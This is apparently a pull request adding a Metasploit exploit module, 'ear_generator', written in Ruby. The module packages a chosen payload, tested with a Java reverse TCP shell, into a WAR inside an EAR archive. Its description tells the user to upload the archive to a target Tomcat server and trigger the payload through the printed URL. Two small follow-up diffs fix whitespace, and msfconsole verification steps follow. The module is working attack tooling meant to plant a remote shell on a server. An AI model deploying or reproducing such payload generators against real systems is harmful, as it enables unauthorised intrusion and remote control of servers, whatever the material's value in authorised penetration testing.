### PR TITLE
Created the ear_generator module to automatically generate EAR shells

### DIFF
--- a/modules/exploits/multi/misc/ear_generator.rb
+++ b/modules/exploits/multi/misc/ear_generator.rb
@@ -1,0 +1,69 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FILEFORMAT
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'          => 'EAR payload generator',
+      'Description'   => %q{
+        This modules generates EAR file containing the payload of your choice.
+        You can then take this generated file and upload it to your target tomcat server.
+        Use the url location printed at the end of the module execution in order to trigger your exploit.
+        Inspired by the metasploit module manageengine_auth_upload.
+        
+        Tested with java/shell_reverse_tcp payload
+      },
+      'Author'        =>
+        [
+          'Abdessamad DHASSI <abdoudhassi[at]gmail.com>'
+        ],
+      'License'       => MSF_LICENSE,
+      'Platform'       => 'java',
+      'Arch'           => ARCH_JAVA,
+      'Targets'        =>
+        [
+          [ 'Automatic', { } ]
+        ],
+      'DisclosureDate' => 'Nov 24 2017',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('FILENAME',
+          [true, 'EAR filename', 'shell.ear']),
+      ])
+  end
+
+
+  def exploit
+    # First we generate the WAR with the payload...
+    war_app_base = rand_text_alphanumeric(4 + rand(32 - 4))
+    war_payload = payload.encoded_war({ :app_name => war_app_base })
+    print_status("generated war file #{war_app_base}")
+
+    # ... and then we create an EAR file that will contain it.
+    ear_app_base = rand_text_alphanumeric(4 + rand(32 - 4))
+    app_xml = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>"
+    app_xml << '<application>'
+    app_xml << "<display-name>#{rand_text_alphanumeric(4 + rand(32 - 4))}</display-name>"
+    app_xml << "<module><web><web-uri>#{war_app_base + ".war"}</web-uri>"
+    app_xml << "<context-root>/#{ear_app_base}</context-root></web></module></application>"
+
+    # Zipping with CM_STORE to avoid errors while decompressing the zip
+    # in the Java vulnerable application
+    ear_file = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
+    ear_file.add_file(war_app_base + '.war', war_payload.to_s)
+    ear_file.add_file('META-INF/application.xml', app_xml)
+
+    # Now generate the actual ear file
+    file_create(ear_file.pack)
+	print_good("Generated. Use this url /#{ear_app_base}")
+  end
+end
+

--- a/modules/exploits/multi/misc/ear_generator.rb
+++ b/modules/exploits/multi/misc/ear_generator.rb
@@ -16,7 +16,6 @@ class MetasploitModule < Msf::Exploit::Remote
         You can then take this generated file and upload it to your target tomcat server.
         Use the url location printed at the end of the module execution in order to trigger your exploit.
         Inspired by the metasploit module manageengine_auth_upload.
-        
         Tested with java/shell_reverse_tcp payload
       },
       'Author'        =>

--- a/modules/exploits/multi/misc/ear_generator.rb
+++ b/modules/exploits/multi/misc/ear_generator.rb
@@ -63,7 +63,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Now generate the actual ear file
     file_create(ear_file.pack)
-	print_good("Generated. Use this url /#{ear_app_base}")
+    print_good("Generated. Use this url /#{ear_app_base}")
   end
 end
 


### PR DESCRIPTION
This module generates a java payload in the format of an EAR file.

## Verification

- [ ] Start `msfconsole`
- [ ] `use exploit/multi/misc/ear_generator`
- [ ] `run`

It should generate a file named shell.ear under Metasploit's local directory. Unless you change the FILENAME option.

